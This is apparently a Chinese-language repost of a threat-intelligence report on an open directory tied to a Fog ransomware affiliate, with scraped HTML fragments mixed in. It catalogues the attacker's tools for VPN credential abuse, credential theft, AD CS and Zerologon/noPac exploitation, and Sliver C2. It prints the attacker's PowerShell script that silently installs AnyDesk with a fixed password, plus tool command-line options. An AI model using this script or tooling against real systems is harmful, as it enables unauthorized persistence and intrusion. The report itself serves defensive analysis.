关键要点
-
• 2024 年 12 月发现了一个与勒索软件附属公司相关的开放目录,可能与 Fog 勒索软件组织有关。它包含用于侦察、利用、横向移动和持久性的工具和脚本。 -
• 初始访问权限是使用泄露的 SonicWall VPN 凭据获得的,而其他攻击性工具则为凭据盗窃、利用 Active Directory 漏洞和横向移动提供了便利。 -
• 持久性通过 AnyDesk 维护,由预配置远程访问凭证的 PowerShell 脚本自动实现。 -
• Sliver C2 可执行文件托管在服务器上,用于命令和控制作,以及 Proxychains 隧道。 -
• 受害者横跨欧洲、北美和南美的多个行业,包括技术、教育和物流,凸显了该附属公司的广泛目标范围。
摘要
DFIR 报告的威胁情报小组在 2024 年 12 月发现了一个开放目录,托管在 194.48.154.79:80。该目录可能与与 Fog 组织相关的勒索软件运营商有关,该组织于 2024 年年中首次观察到。对其内容的分析揭示了一个用于侦察、利用、凭证盗窃和命令和控制活动的综合工具包。
这些工具包括用于利用 VPN 凭据的 SonicWall Scanner、用于提取受 Windows DPAPI 保护的凭据的 DonPAPI、用于滥用 Active Directory 证书服务 (AD CS) 的 Certipy、Zer0dump 和用于利用 CVE-2020-1472 等 Active Directory 漏洞的 Pachine/noPac。
该附属公司还通过自动化 PowerShell 脚本利用 AnyDesk 实现持久性,并在服务器上托管 Sliver C2 组件来管理植入物。Proxychains 和 Powercat 用于促进隐蔽的横向移动和反向外壳。目录中发现的受害者数据表明,受害者的目标涉及多个行业,包括技术、教育和物流,地理重点是意大利、希腊、巴西和美国。
基于钻石模型的情报分析
攻击者
DFIR 报告的威胁情报小组基于Fog 勒索软件组织的目录浏览漏洞服务器,评估本次攻击情报的等级为中风险,依据如下:
-
• 受害者在开放目录中被入侵的证据,后来出现在 Fog Ransomware 的专用泄漏站点 (DLS) 上 -
• VirusTotal 情报社区也对相关IP有所标记
在通过
fofa.info
检索的已保存的开放目录内容中,有一个名为
ouroverde.net.br
的文件夹,该文件夹是攻击者的受害者。
"
target="_blank"
style="color: #576b95; text-decoration: none;">
http://www.w3.org/TR/html4/strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Directory listing for /</title></head><body><h1>Directory listing for /</h1><hr><ul><li><a href=".bash_history">.bash_history</a></li><li><a href=".bashrc">.bashrc</a></li><li><a href=".cache/">.cache/</a></li><li><a href=".config/">.config/</a></li><li><a href=".gnupg/">.gnupg/</a></li><li><a href=".local/">.local/</a></li><li><a href=".nxc/">.nxc/</a></li><li><a href=".profile">.profile</a></li><li><a href=".sliver/">.sliver/</a></li><li><a href=".sliver-client/">.sliver-client/</a></li><li><a href=".ssh/">.ssh/</a></li><li><a href=".wget-hsts">.wget-hsts</a></li><li><a href=".Xauthority">.Xauthority</a></li>.xorgxrdp.10.log "
target="_blank"
style="color: #576b95; text-decoration: none;">
xorgxrdp.10.log">.xorgxrdp.10.log
<li><a href=".xsession-errors">.xsession-errors</a></li>20241121150831_Certipy.zip "
target="_blank"
style="color: #576b95; text-decoration: none;">
20241121150831_Certipy.zip">20241121150831_Certipy.zip
any.ps1 "
target="_blank"
style="color: #576b95; text-decoration: none;">
any.ps1">any.ps1
AnyDesk.exe "
target="_blank"
style="color: #576b95; text-decoration: none;">
AnyDesk.exe">AnyDesk.exe
<li><a href="Certipy/">Certipy/</a></li><li><a href="Desktop/">Desktop/</a></li><li><a href="Documents/">Documents/</a></li>DonPAPI-1.0.0/ "
target="_blank"
style="color: #576b95; text-decoration: none;">
DonPAPI-1.0.0/">DonPAPI-1.0.0/
<li><a href="Downloads/">Downloads/</a></li><li><a href="Music/">Music/</a></li><li><a href="noPac/">noPac/</a></li><li><a href="orpheus/">orpheus/</a></li>ouroverde.net.br/ "
target="_blank"
style="color: #576b95; text-decoration: none;">
ouroverde.net.br/">ouroverde.net.br/
<li><a href="Pachine/">Pachine/</a></li><li><a href="Pictures/">Pictures/</a></li>powercat.ps1 "
target="_blank"
style="color: #576b95; text-decoration: none;">
powercat.ps1">powercat.ps1
<li><a href="Public/">Public/</a></li><li><a href="sliver-client_linux">sliver-client_linux</a></li>sliver-client_linux.sig "
target="_blank"
style="color: #576b95; text-decoration: none;">
sliver-client_linux.sig">sliver-client_linux.sig
<li><a href="sliver-server">sliver-server</a></li>sliver-server_linux.sig "
target="_blank"
style="color: #576b95; text-decoration: none;">
sliver-server_linux.sig">sliver-server_linux.sig
slv.bin "
target="_blank"
style="color: #576b95; text-decoration: none;">
slv.bin">slv.bin
<li><a href="snap/">snap/</a></li><li><a href="sonic_scan/">sonic_scan/</a></li>sonic_scan.zip "
target="_blank"
style="color: #576b95; text-decoration: none;">
sonic_scan.zip">sonic_scan.zip
<li><a href="Templates/">Templates/</a></li><li><a href="thinclient_drives/">thinclient_drives/</a></li>v1.0.0.zip "
target="_blank"
style="color: #576b95; text-decoration: none;">
v1.0.0.zip">v1.0.0.zip
<li><a href="Videos/">Videos/</a></li><li><a href="zer0dump/">zer0dump/</a></li></ul><hr></body></html>
该公司列在 Fog 的数据泄露站点中,如下图所示。
主机的 bash 历史记录中提到了“
fourlis.net”的内部域名,这表明攻击者已成功入侵该网络。
虽然这个特定的受害者没有出现在数据泄露网站上,但在同一时期发布了一篇文章:
在 VirusTotal 的评论部分,一位用户提到该服务器被用作C2服务器,也可能用于数据泄露。
基础设施
Sliver: 攻击者利用服务器托管 Sliver C2,如 ThreatFox 中列出的文件,并基于驻留在 open-directory 中的文件。
DFIR 威胁情报小组于 2024 年 12 月 11 日观察到该服务器托管 Sliver Team 服务器端口 31337,但在第一次看到后没有再次出现。
在非常短的时间内,另一个 Sliver C2 部署在同一个 ASN 中,即 AS62240,该 ASN 由托管服务提供商 Clouvider 拥有。同一攻击者可能从同一提供商处购买了多台服务器来部署其命令和控制服务器。但是,没有找到托管提供商和 C2 框架之外的其他链接。
技战法
边界突破
有效账户
SonicWall 扫描仪: 服务器包含一个名为
sonic_scan.zip
的 ZIP 文件,其中包含一个 Python 脚本和一个文件
data.txt,其中包含可能泄露的
VPN 凭证,其结构如下:
-
• Target IP Address 目标 IP 地址 -
• Username 用户名 -
• Password 密码 -
• Domain Name 域名 -
• VPN Software VPN 软件
攻击者利用脚本 sonic_scan/
main.py
登陆 SonicWall VPN 设备进行身份验证并执行端口扫描:
-
• Reads and parses
data.txt
to get the IP address, username, password and domain name (if any) of the target appliance. -
• 读取和解析
data.txt
以获取目标设备的 IP 地址、用户名、密码和域名(如果有)。 -
• For every entry in
data.txt,
which represents a potential valid account, obtains the domain name associated with the specific IP address and then executes the NetExtender process to login into the target VPN. NetExtender is a SonicWall command-line utility which allows access a VPN server. Specifically, NetExtender is executed via this command-line: netextender –username –password –domain –always-trust . -
• 对于
data.txt
中的每个条目(代表一个潜在的有效帐户),获取与特定 IP 地址关联的域名,然后执行 NetExtender 进程以登录到目标 VPN。NetExtender 是一个 SonicWall 命令行实用程序,允许访问 VPN 服务器。具体来说,NetExtender 通过以下命令行执行:netextender < 目标 IP 地址> –用户名< 目标用户名> –密码< 用户名 password> –域< 目标域名> –always-trust。 -
• After the execution of NetExtender, the script parses the output produced by the VPN and, if the connection was successful, a loop is initiated until the string “NetExtender connected successfully” is found. During this loop, IP addresses are extracted and appended to a list which is then provided to Nmap for port scanning. -
• 执行 NetExtender 后,该脚本将解析 VPN 生成的输出,如果连接成功,则启动一个循环,直到找到字符串“NetExtender connected successfully”。在此循环期间,提取 IP 地址并附加到一个列表中,然后提供给 Nmap 进行端口扫描。 -
• Once the Nmap scan is completed, the NetExtender process is terminated. -
• Nmap 扫描完成后,NetExtender 进程将终止。
Arctic Wolf 还将使用受损的 SonicWall 凭据与 Fog 勒索软件联系起来。
横向移动
远程服务:SMB/Windows 管理员共享
NetExec 的:NetExec 是从 CrackMapExec 演变而来的后漏洞利用工具。它具有用于远程命令执行、网络枚举和权限提升的多种特性和功能。
权限维持
创建或修改系统进程:Windows 服务
AnyDesk: 为了在受感染的 Windows 主机上建立持久性,攻击者利用著名的远程监控和管理 (RMM) 工具 AnyDesk。PowerShell 脚本 “
any.ps1”
自动下载和安装 AnyDesk,包括设置密码 Admin#123
以访问 RMM。
Function AnyDesk {mkdir "C:\ProgramData\AnyDesk"# Download AnyDesk$clnt = new-object
System.Net.WebClient
$url = "
http://download.anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\
AnyDesk.exe"
$
clnt.DownloadFile($url,$file)
# powershell mkdir "C:\ProgramData\AnyDesk"# powershell -command "(new-object
System.Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.exe',
'C:\ProgramData\
AnyDesk.exe')"
cmd.exe
/c C:\ProgramData\
AnyDesk.exe
--install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe
/c echo Admin#123 | C:\ProgramData\
anydesk.exe
--set-password
cmd.exe
/c C:\ProgramData\
AnyDesk.exe
--get-id}
lolrmm.io
中详细介绍了 AnyDesk 的全面描述和所有可能的检测技术。
凭证访问
来自密码存储的凭据
DonPAPI & Impacket dpapi:DonPAPI 提供了从受感染的 Windows 系统中查找和检索受 Windows 数据保护 API (DPAPI) 保护的凭据的功能,例如:
-
• Chromium 浏览器凭据、Cookie 和令牌。 -
• Firefox 浏览器凭据和 Cookie。 -
• Windows 证书。 -
• 凭据管理器。 -
• 文件库凭证。
.bash_history 显示攻击者使用以下命令行选项使用 DonPAPI:
-
• -pvk .pvk: 指定用于解密受 DPAPI 保护的凭据的私钥文件 (PVK)。 -
• –no_vnc: 禁用 VNC 凭证的收集。 -
• –no_remoteops: 禁止从远程系统收集凭证。 -
• –GetHashes: 启用 NTLM 哈希的集合。 -
• –no_recent: 禁用最近使用的文件和文档的收集 -
• –no_sysadmins: 将系统管理员排除在凭证收集过程中 -
• -o : 将输出保存到特定文件夹中。
攻击者还使用 Impacket 套件中的
dpapi.py
来检索域备份密钥。
窃取或伪造身份验证证书
Certipy:Certipy 是一种基于 Python 的工具,用于创建用于与 Active Directory 证书服务 (AD CS) 交互,专门用于枚举、识别和利用易受攻击的证书模板,最终目的是模拟高特权帐户。
下图显示了攻击者如何启动查找功能来检测易受攻击的 AD CS 模板。
窃取或伪造 Kerberos 票证:Kerberoasting
Orpheus:Orpheus 是 Trustedsec 基于 Impacket 的
GetUserSPNs.py
和
kerberosv5.py
设计的攻击性 Python 工具。该工具采用防御规避机制构建,因为它将加密类型从 Kerberoasting 攻击中常见的 RC4 (eType 23) 更改为合法流量中常见的 AES-256 (eType 18)。
根据可用的 .bash_history 文件,攻击者只下载了该工具。
权限提升
利用权限提升
zer0dump 中:Zer0dump 是针对 Zerologon 漏洞 (CVE-2020-1472) 的概念验证 (PoC) 漏洞。该工具允许未修补的域控制器入侵,以获得 Active Directory 环境中的域管理员权限。
Zerologon 利用是通过以下步骤进行的:
-
• 利用 Netlogon 的 AES-CFB8 实现中的加密漏洞,该漏洞允许攻击者通过发送 ClientCredential 字段填充为零的 Netlogon 消息来绕过身份验证。 -
• 将域控制器的计算机帐户密码重置为空字符串,从而有效地授予对域的管理访问权限。 -
• 与 Impacket 的
secretsdump.py
集成,以从受感染的域控制器中提取凭据。 -
• 利用漏洞后,zer0dump 会尝试恢复原来的机器账号密码。
Pachine & noPac:Pachine 和 noPac 是为利用 CVE-2021-42278 和 CVE-2021-42287 漏洞而开发的攻击性工具,允许在 Active Directory 中进行权限升级。他们利用 Kerberos 特权属性证书 (PAC) 从标准域帐户开始可能模拟域管理员。
Pachine 的扫描选项枚举域控制器以确定它是否容易受到 CVE-2021-42278 的攻击。
要利用前面提到的漏洞,noPac 需要有效的域帐户凭据,这些凭据被滥用来获取可用于危害域管理员的 Kerberos 票证。
下图显示了使用 noPac 模拟域管理员管理员。
这两个工具之间的主要区别在于:
-
• Pachine 添加计算机帐户并获取特定 SPN 的 TGS。 -
• NoPac 还提供了删除 shell 和转储哈希的功能。
远程控制
代理
Proxychains:Proxychains 是一种用于通过代理服务器路由网络流量的工具,它支持 SOCKS4、SOCKS5 和 HTTPS 等多种类型的代理。代理链可以与开发后框架(例如 Sliver、Cobalt Strike 等)结合使用,以通过植入程序路由流量。
下图显示了攻击者如何利用代理链将 Python 脚本(如 certipy 或
noPac.py)从命令和控制服务器执行到目标环境中。
下图显示了 proxychains 的工作原理。该工具非常强大,因为攻击者可以从命令和控制服务器执行工具,与在受监控系统上运行可能留下的工件相比,留下的足迹更少。
应用层协议:Web 协议
Sliver: 开放目录中存在两个与 Sliver 关联的二进制文件:
slv.bin
和 sliver-client_linux。我们还在基础设施部分注意到,此 IP 地址曾经被视为 Sliver C2。
由于 shellcode 已加密,因此无法分析
slv.bin
并从 shellcode 中获取更多信息。很可能,它被用来连接回同一个 Sliver 服务器。二进制 sliver-client_linux 是用于连接到 Sliver 服务器的可执行文件,但没有观察到 Sliver 的进一步使用。
协议隧道
Powercat: 主机上存在一个名为
powercat.ps1
的 Powercat 副本。Powercat 是一种基于 PowerShell 的网络工具,旨在复制 Netcat 提供的功能。它可用于:
-
• 网络通信,因为它同时支持 TCP 和 UDP 连接。 -
• 绑定和反向 shell 创建以侦听传入连接或连接回命令和控制服务器。 -
• 通过 TCP、UDP 和 DNS (dnscat2) 传输数据,这对于规避网络检测机制很有用。 -
• 有效负载生成和编码。 -
• 流量隧道,用于连接到否则无法访问的系统。
攻击目标
国家
在文件
data.txt
中找到的所有 IP 地址(存在于 ZIP 文件
sonic_scan.zip)都位于意大利,并与
AS5602 Retelit Digital Services
S.p.A.
相关联,这是一家提供 IT 和网络安全服务的公司。其他受害者位于以下国家/地区:
-
• 希腊 -
• 美国 -
• 巴西
行业受攻击者影响的行业如下:
-
• 科技 -
• 教育 -
• 零售 -
• 运输与物流
钻石模型
MITRE ATT&CK
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论